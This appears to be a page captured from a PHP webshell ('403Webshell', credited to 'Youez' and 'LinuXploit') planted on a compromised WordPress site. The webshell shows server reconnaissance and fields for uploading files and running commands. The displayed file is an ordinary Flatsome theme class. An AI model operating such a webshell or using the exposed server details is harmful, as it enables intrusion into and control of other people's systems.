403Webshell
Server IP : 104.21.14.103  /  Your IP : 3.141.193.29
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/home/giankuin/dietcontrungnhanh.com/wp-content/themes/flatsome/inc/classes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/home/giankuin/dietcontrungnhanh.com/wp-content/themes/flatsome/inc/classes/class-flatsome.php
<?php
/**
 * Flatsome class.
 *
 * @author  UX Themes
 * @package Flatsome
 * @since   3.18.0
 */

defined( 'ABSPATH' ) || exit;

/**
 * Class Flatsome
 *
 * @package Flatsome
 */
final class Flatsome {

	/**
	 * Parent theme version.
	 *
	 * @var string
	 */
	private $version;

	/**
	 * The Flatsome_Theme_JSON instance.
	 *
	 * @var Flatsome_Theme_JSON
	 */
	private $theme_json;

	/**
	 * The single instance of the class.
	 *
	 * @var Flatsome
	 */
	protected static $instance = null;

	/**
	 * Flatsome constructor.
	 */
	private function __construct() {
		$this->version = wp_get_theme( get_template() )->get( 'Version' );

		$this->theme_json = new Flatsome_Theme_JSON();
	}

	/**
	 * Initialize Flatsome.
	 */
	public function init() {
		$this->theme_json->init();

		if ( is_woocommerce_activated() ) {
			Flatsome\WooCommerce\MiniCart::instance();
			Flatsome\WooCommerce\Shipping::instance();
		}
	}

	/**
	 * Get parent theme version.
	 *
	 * @return string
	 */
	public function version() {
		return $this->version;
	}

	/**
	 * Main instance.
	 *
	 * @return Flatsome
	 */
	public static function instance() {
		if ( is_null( self::$instance ) ) {
			self::$instance = new self();
		}

		return self::$instance;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit